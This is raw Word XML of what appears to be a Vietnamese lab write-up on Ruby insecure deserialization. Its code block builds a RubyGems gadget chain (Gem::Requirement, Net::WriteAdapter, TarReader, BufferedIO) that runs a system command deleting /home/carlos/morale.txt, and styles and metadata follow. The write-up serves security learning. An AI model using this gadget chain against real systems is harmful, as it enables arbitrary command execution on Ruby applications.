    <w:p w14:paraId="2A08B848" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t># Monkey patch để chèn payload vào Requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B925D47" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>module Gem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29112C55" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">  class Requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE93EB" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">    def marshal_dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDD6C71" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">      [@requirements]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C963597" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">    end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992DC83" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">  end  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722274C3" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">end  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE6619D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573B98C7" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>wa1 = Net::WriteAdapter.new(Kernel, :system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460F4D8" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369DC12F" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>rs = Gem::RequestSet.allocate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D090330" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>rs.instance_variable_set('@sets', wa1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC1D7B" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t># Lệnh xóa file của bạn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A93D7BE" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8689D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47625202" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>wa2 = Net::WriteAdapter.new(rs, :resolve)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1040D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36351AB9" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>i = Gem::Package::TarReader::Entry.allocate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F074C" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>i.instance_variable_set('@read', 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7AB27" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>i.instance_variable_set('@header', "aaa")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CDC803" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157F1AEC" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>n = Net::BufferedIO.allocate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48387EB7" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>n.instance_variable_set('@io', i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A62080D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>n.instance_variable_set('@debug_output', wa2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB9ED5" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D692F7D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>t = Gem::Package::TarReader.allocate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FADA5" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>t.instance_variable_set('@io', n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C5679D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E24AF40" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>r = Gem::Requirement.allocate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BD95F" w14:textId="6EA60311" w:rsidR="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>r.instance_variable_set('@requirements', t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D92EA2" w14:textId="77777777" w:rsidR="00DC2C2C" w:rsidRDefault="00DC2C2C" w:rsidP="00765C11">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093A7728" w14:textId="337F452F" w:rsidR="00765C11" w:rsidRDefault="00765C11" w:rsidP="00765C11">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00765C11">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348DFD8F" wp14:editId="2D2B1F19">
            <wp:extent cx="5943600" cy="402590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191167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753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75C2" w14:textId="2C5ACAE7" w:rsidR="00765C11" w:rsidRDefault="00765C11" w:rsidP="00765C11">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00765C11">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C60435" wp14:editId="7B053E0C">
            <wp:extent cx="5943600" cy="3493135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3281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651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C11">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3226BB1D" wp14:editId="267836C8">
            <wp:extent cx="5943600" cy="1301115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12722981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98115" name="Picture 1" descr="A screen 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2B70" w14:textId="77777777" w:rsidR="00765C11" w:rsidRDefault="00765C11" w:rsidP="00E2692F"/>
    <w:sectPr w:rsidR="00765C11" w:rsidSect="00403E9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6357"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA224520"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="DCCT-Level1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Chương %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1191" w:hanging="1191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hanging="73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2211" w:hanging="96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8237D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92BCBC2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08272889">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="151075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A3A"/>
    <w:rsid w:val="0003428C"/>
    <w:rsid w:val="00036F8E"/>
    <w:rsid w:val="000B578E"/>
    <w:rsid w:val="000E50EC"/>
    <w:rsid w:val="000F2617"/>
    <w:rsid w:val="000F7EDC"/>
    <w:rsid w:val="00112CAE"/>
    <w:rsid w:val="00161BFB"/>
    <w:rsid w:val="0017104B"/>
    <w:rsid w:val="001763BC"/>
    <w:rsid w:val="001E0936"/>
    <w:rsid w:val="001E1561"/>
    <w:rsid w:val="001E76F5"/>
    <w:rsid w:val="001F36CE"/>
    <w:rsid w:val="00261714"/>
    <w:rsid w:val="002A6E96"/>
    <w:rsid w:val="002F54CC"/>
    <w:rsid w:val="003116D0"/>
    <w:rsid w:val="0035746B"/>
    <w:rsid w:val="00360FCC"/>
    <w:rsid w:val="003C7D59"/>
    <w:rsid w:val="00403E9F"/>
    <w:rsid w:val="00465CF5"/>
    <w:rsid w:val="004B3757"/>
    <w:rsid w:val="004C4A3A"/>
    <w:rsid w:val="00510BC5"/>
    <w:rsid w:val="00546CA8"/>
    <w:rsid w:val="005847A0"/>
    <w:rsid w:val="005A2B3C"/>
    <w:rsid w:val="005B1CC4"/>
    <w:rsid w:val="005C24A1"/>
    <w:rsid w:val="005E7798"/>
    <w:rsid w:val="0060784F"/>
    <w:rsid w:val="00623198"/>
    <w:rsid w:val="006637CE"/>
    <w:rsid w:val="00664798"/>
    <w:rsid w:val="00675D9E"/>
    <w:rsid w:val="006A3EEE"/>
    <w:rsid w:val="006B4622"/>
    <w:rsid w:val="007026D7"/>
    <w:rsid w:val="00765C11"/>
    <w:rsid w:val="00785A41"/>
    <w:rsid w:val="0078749B"/>
    <w:rsid w:val="0079078C"/>
    <w:rsid w:val="00791F9E"/>
    <w:rsid w:val="007D155F"/>
    <w:rsid w:val="007F1C84"/>
    <w:rsid w:val="008151E6"/>
    <w:rsid w:val="00824B29"/>
    <w:rsid w:val="00856B58"/>
    <w:rsid w:val="00883E9E"/>
    <w:rsid w:val="008974C0"/>
    <w:rsid w:val="008C028F"/>
    <w:rsid w:val="008E6FDD"/>
    <w:rsid w:val="009223A7"/>
    <w:rsid w:val="00965209"/>
    <w:rsid w:val="009C2695"/>
    <w:rsid w:val="009F6D07"/>
    <w:rsid w:val="00A04FF3"/>
    <w:rsid w:val="00AA226C"/>
    <w:rsid w:val="00B3694B"/>
    <w:rsid w:val="00B52F92"/>
    <w:rsid w:val="00B83AB7"/>
    <w:rsid w:val="00C5484C"/>
    <w:rsid w:val="00C71DD8"/>
    <w:rsid w:val="00C84677"/>
    <w:rsid w:val="00CC16E8"/>
    <w:rsid w:val="00CD71DA"/>
    <w:rsid w:val="00D64E9B"/>
    <w:rsid w:val="00D70291"/>
    <w:rsid w:val="00D97A81"/>
    <w:rsid w:val="00DA25E5"/>
    <w:rsid w:val="00DC2C2C"/>
    <w:rsid w:val="00DD71DD"/>
    <w:rsid w:val="00E2692F"/>
    <w:rsid w:val="00E63096"/>
    <w:rsid w:val="00E94FF7"/>
    <w:rsid w:val="00ED409E"/>
    <w:rsid w:val="00EE537A"/>
    <w:rsid w:val="00F44F0F"/>
    <w:rsid w:val="00F63746"/>
    <w:rsid w:val="00F803D5"/>
    <w:rsid w:val="00F91D11"/>
    <w:rsid w:val="00FA4A5D"/>
    <w:rsid w:val="00FC5B03"/>
    <w:rsid w:val="00FD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37542"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BA15E63C-DCF9-493B-A29D-3F153B711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6CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="2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E6FDD"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr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6CE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2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6CE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi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5CF5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5CF5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A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A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A3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A3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DD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="35"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001F36CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2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F36CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi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65CF5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="001F36CE"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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B3694B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694B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b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8E6FDD"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr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rsid w:val="00465CF5"/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paragraph" w:customStyle="1" w:styleId="DCCT-Level1">
    <w:name w:val="DCCT-Level1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="003116D0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:lang w:val="vi-VN" w:bidi="ar-SA"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="UH1">
    <w:name w:val="UH1"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00F91D11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      <w:ind w:right="567"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Angsana New"/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-AU" w:eastAsia="en-AU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DD71DD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2559"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1699" w:hanging="864"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Cordia New"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="35"/>
      <w:lang w:val="en-AU"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00403E9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403E9F"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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A3A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="28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A3A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="28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A3A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="2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A3A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="35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A3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4A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4A3A"/>
    <w:pPr>
      <w:spacing w:before="160" w:after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4C4A3A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="35"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="004C4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A3A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="35"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="004C4A3A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EE537A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="35"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE537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E75EA-B9C5-4AB3-9F4E-0EA2133DF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15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Vũ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dũng Vũ</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-28T02:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-28T09:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>